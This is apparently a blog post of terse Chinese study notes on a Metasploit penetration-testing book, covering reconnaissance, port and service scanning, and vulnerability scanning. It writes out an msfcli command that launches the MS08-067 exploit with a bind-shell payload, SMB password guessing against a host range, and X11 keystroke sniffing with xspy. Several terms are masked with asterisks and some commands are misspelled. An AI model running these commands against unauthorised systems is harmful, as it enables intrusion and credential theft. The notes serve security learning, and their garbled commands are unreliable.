metasploit

Metasploit***測試指南

David Kennedy Diehold公司首席信息安全官。SET fast-Tracl Back Track和Exploit Database社會工程學博客網站
black hat defcon shmoocon security B-sides

Jim o'Gorman CSc公司strickForce團隊的 social-engineerorg 數字取證分析和惡意代碼分析
Devon Kearns offensive-security團隊的一位培訓講師。back Track的開發者。揭祕教程wiki的維護者
Mati Aharoni 信達雅
沒有web voip scada 真實的***案例:諸葛建偉

***測試技術基礎
PTES
前期交互
情報蒐集階段
威助建模
漏洞分析
******
後******
報告
***測試類型
白盒
黑盒測試
漏洞掃描器

Metasploit
專業術語
exploit
payload
shellcode
module
listener
Metsploit
Msf終端
命令行
Armitage
用戶接口
功能程序
MSF***載荷生成器
MSF編碼器
nasm shell
express pro
第三章情報搜索
被動
whois
netcraft
Nslookup
主動
namp
Metasploit使用數據庫
metasploit使用端口掃描
針對性掃描
服務器消息協議掃描
搜尋配置不當的SQL server
SSH
FTP
SNMP
編寫自己的掃描器
2。2
cd /opt/framework3/msf3/
msfconsloe
help connect
終端交互 訪問所有軟件的功能特性
msfcli 腳本測試
msfcli windows/smb/ms08_067_netapi O
msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
Start MSF
armitage
功能程序:::

公開渠道情報 OSINT yeti whois
能夠***那些系統 邊界。
searchdns.netcraft.com 網站對應IP
主動
nmap -sS -Pn 172.16.32.131 -Pn默認都是存活狀態,不先ping測試存活狀態 -sS隱祕TCP
-A 服務枚舉和旗標獲取

3.2.2數據庫
/etc/init.d/postgresql-8.3 start
db_connect postgres:[email protected]/msfbook
第一次連接冗長的輸出
db_status

nmap -Pn -sS -A -oX subnet1 192.168.1.0/24
db_connect postgres:[email protected]/msfbook
dm_import Subnet1.xml
db_hosts -c address
TCP空閒掃描
msf use auxiliary/scanner/ip/ipidseq
set RHosts 192.168.1.0/24
set threads 50 run
在windows平臺線程不過16 ,類UNix lInux 128
nmap -PN -sI 192.168.1.109 192.168.1.155

db_connect postgres:[email protected]/msfbook
db_nmap -sS -A 172.16.32.131
db_services
search portscan
use scanner/portscan/syn
set Rhosts 192.168.1.155
set threads 50
run
3.3針對性服務掃描
use scanner/smb/smb_version
set rhost
run
show options
db_hosts -c address,os_flavor
快速且安全定位高風險主機的方法
use scanner/mssql/mssql_ping
show options
set rhosts 192.168.1.0/24
set threads 255
run

use scanner/ssh/ssh_version
set threads 50
run
use scanner/ftp/ftp_version
set threads 50
run
use scanner/ftp/anonymous
set threads 50
run
團體字符串
use use scanner/snmp/snmp_login
set rhosts 192.168.1.0/24
出廠的默認設置
3。4ruby腳本
mixin


4.1
漏洞掃描
netcat
nc 192.168.1.203 89
誤報和漏報
NeXpose NEssus
社區共享版
web
db_connect postgres:[email protected]/msfbook
db_import /tmp/host_195.xml
db_vulns
db_destory刪除現有的數據庫
db_connect 新的
load nexpose
nexpose_connect -h
nexpost_connect dookie:[email protected] ok

nexpose_scan 192.168.1.195
db-host -c address
nessus http://localhost:8834
load nessus
nessus_connect dookie:[email protected]:8834 ok
nessus_policy_list
nessus_scan_now
nessus_scan_new 2 bridge_scan 192.168.1.195
nessus_report_list
nessus_report_get 報告ID

use auxiliary/scanner/smb/smb_login
show options
set rhosts 192.168.1.150-155
set SMBUser Administrator
set SMBPass s3cr3t

use auxiliary/scanner/vnc/nvc_none_auth
set Rhosts 192.168.1.155
run
vncviewer

useauxiliary/scanner/x11/open_x11
cd /pentest/snfifers/sxpy
./xspy -display 192.168.1.23:0 -delay 100
Autopwn自動選擇




發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章